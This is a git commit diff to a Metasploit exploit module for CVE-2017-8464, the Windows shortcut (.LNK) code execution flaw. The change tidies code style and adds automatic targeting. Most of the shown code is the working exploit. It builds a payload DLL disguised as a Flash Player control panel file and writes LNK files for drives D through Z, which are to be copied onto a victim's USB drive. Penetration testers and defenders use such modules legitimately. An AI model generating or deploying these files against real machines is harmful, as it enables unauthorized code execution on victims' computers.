code style cleanup + add automatic targeting based on payload

bug/bundler_fix
Brent Cook 2017-08-03 00:27:54 -05:00
parent b62429f6fa
commit ddd841c0a8
1 changed files with 64 additions and 68 deletions


@ -12,7 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote
attr_accessor :exploit_dll_name attr_accessor :exploit_dll_name
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
update_info(
info,
'Name' => 'LNK Code Execution Vulnerability', 'Name' => 'LNK Code Execution Vulnerability',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
@ -41,44 +43,46 @@ class MetasploitModule < Msf::Exploit::Remote
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'process', 'EXITFUNC' => 'process'
}, },
'Arch' => [ARCH_X86, ARCH_X64], 'Arch' => [ARCH_X86, ARCH_X64],
'Payload' => 'Payload' =>
{ {
'Space' => 2048, 'Space' => 2048
}, },
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { 'Arch' => ARCH_ANY } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ] [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
], ],
'DefaultTarget' => 0, # Default target is 64-bit 'DefaultTarget' => 0, # Default target is 64-bit
'DisclosureDate' => 'Jun 13 2017')) 'DisclosureDate' => 'Jun 13 2017'
)
)
register_options( register_options(
[ [
OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']), OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']), OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine']) OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
]) ]
)
register_advanced_options( register_advanced_options(
[ [
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]) OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
]) ]
)
end end
def exploit def exploit
opts = {} path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
if target['Arch'] == ARCH_X64 arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464') datastore['EXE::Path'] = path
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x64_windows.dll') datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
else
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x86_windows.dll')
end
dll = generate_payload_dll dll = generate_payload_dll
dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll" dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
dll_path = store_file(dll, dll_name) dll_path = store_file(dll, dll_name)
@ -90,16 +94,13 @@ class MetasploitModule < Msf::Exploit::Remote
lnk_path = store_file(lnk, lnk_filename) lnk_path = store_file(lnk, lnk_filename)
print_status("#{lnk_path} created, copy to the target USB drive") print_status("#{lnk_path} created, copy to the target USB drive")
else else
# HACK the vulnerability doesn't appear to work with UNC paths # HACK: the vulnerability doesn't appear to work with UNC paths
# Create LNK files to different drives instead # Create LNK files to different drives instead
# Copying all the LNK files will likely trigger this vulnerability # Copying all the LNK files will likely trigger this vulnerability
('D'..'Z').each do |i| ('D'..'Z').each do |i|
lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk" fname, ext = (datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk").split('.')
if lnk_filename =~ /(.*)\.(.*)/ ext = 'lnk' if ext.nil?
lnk_filename = "#{$1}_#{i}.#{$2}" lnk_filename = "#{fname}_#{i}.#{ext}"
else
lnk_filename = "#{lnk_filename}_#{i}.lnk"
end
lnk = generate_link("#{i}:\\#{dll_name}") lnk = generate_link("#{i}:\\#{dll_name}")
lnk_path = store_file(lnk, lnk_filename) lnk_path = store_file(lnk, lnk_filename)
print_status("#{lnk_path} created, copy to the target USB drive") print_status("#{lnk_path} created, copy to the target USB drive")
@ -174,19 +175,14 @@ class MetasploitModule < Msf::Exploit::Remote
# Store the file in the MSF local directory (eg, /root/.msf4/local/) # Store the file in the MSF local directory (eg, /root/.msf4/local/)
def store_file(data, filename) def store_file(data, filename)
ltype = "exploit.fileformat.#{self.shortname}" @ltype = "exploit.fileformat.#{@shortname}"
if !::File.directory?(Msf::Config.local_directory) if !::File.directory?(Msf::Config.local_directory)
FileUtils.mkdir_p(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory)
end end
if filename and not filename.empty? if filename && !filename.empty?
if filename =~ /(.*)\.(.*)/ fname, ext = filename.split('.')
ext = $2
fname = $1
else
fname = filename
end
else else
fname = "local_#{Time.now.utc.to_i}" fname = "local_#{Time.now.utc.to_i}"
end end